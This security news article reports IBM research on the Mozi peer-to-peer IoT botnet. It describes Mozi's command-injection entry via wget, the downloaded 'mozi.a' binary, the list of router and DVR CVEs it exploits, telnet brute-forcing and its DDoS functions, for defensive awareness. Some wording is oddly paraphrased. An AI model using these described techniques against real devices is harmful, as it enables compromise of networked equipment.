Mozi Botnet, has Fueled a Significant Increase in Internet of Things: IBM

IBM

Mozi, a relatively recent botnet, has driven a major rise in botnet operation over the Internet of Things ( IoT), IBM announced this week.

Mozi has been extremely successful over the past year and accounted for 90 percent of the IoT network traffic detected between October 2019 and June 2020, demonstrating feature overlaps with Mirai and its variants and reusing Gafgyt data, although it did not attempt to delete competitors from infected networks, IBM researchers report.

However, the great rise in IoT attacks could also stem from a greater number of IoT devices being available worldwide, thereby widening the surface of the threat. Currently, IBM reports, there are about 31 billion IoT devices worldwide, with about 127 devices deployed every second.

IBM indicates Mozi ‘s effectiveness is focused on the use of Command Injection (CMDi) attacks that rely on IoT interface misconfigurations. The expanded use of IoT and inadequate setup protocols, along with the expanded remote work attributed to COVID-19, are suspected to be responsible for the spikes.

Almost all of the attacks that were found targeting IoT devices used CMDi for initial entry. Mozi uses a “wget” shell command to leverage CMDi, and then tamper with permissions to enable the attackers’ contact with the affected device.

A file named “mozi.a” was downloaded and then executed on the MIPS architecture on compromised computers. MIPS is a RISC instruction set architecture that can provide an attacker with the ability to change the firmware and plant additional malware. The attack targets computers running a reduced instruction set computer (RISC) architecture.

CVE-2017-17215 (Huawei HG532), CVE-2018-10561 / CVE-2018-10562 (GPON Routers), CVE-2014-8361 (Realtek SDK), CVE-2008-4873 (Sepal SPBOARD), CVE-2016-6277 (Netgear R7000 / R6400), CVE-2015-2051 (D-Link Devices), Eir D1000 wireless router injection, Netgear setup.cgi unauthenticated RCE, MVPower DVR, D-Link UPnP SOAP command

The danger that leverages a predominantly China-based infrastructure (84%) is also capable of brute-forcing telnet passwords and uses a hardcoded list for that.

“Mozi botnet is a peer-to – peer (P2P) botnet based on the distributed messy hash table (DSHT) protocol, which can propagate by exploits of IoT devices and weak telnet passwords,” says IBM.

To verify its credibility, the malware utilises ECDSA384 (elliptic curve digital signature algorithm 384) and includes a series of hardcoded public DHT nodes that can be leveraged to access the P2P network.

The botnet can be used to conduct distributed denial of service ( DDoS) attacks (HTTP, TCP, UDP), to conduct command execution attacks, to download and execute additional payloads, and to collect bot information as well.

“As newer botnet groups like Mozi scale up operations and overall IoT activity surges, companies using IoT devices need to be aware of the threat that is emerging. IBM is seeing corporate IoT devices increasingly under attackers’ fire. The primary attack vector of choice for threat actors remains command injection, reiterating how necessary it is to adjust default system settings and use powerful penetration tests to identify and repair armour holes, IBM concludes.

Mark Funk
Mark Funk is an experienced information security specialist who works with enterprises to mature and improve their enterprise security programs. Previously, he worked as a security news reporter.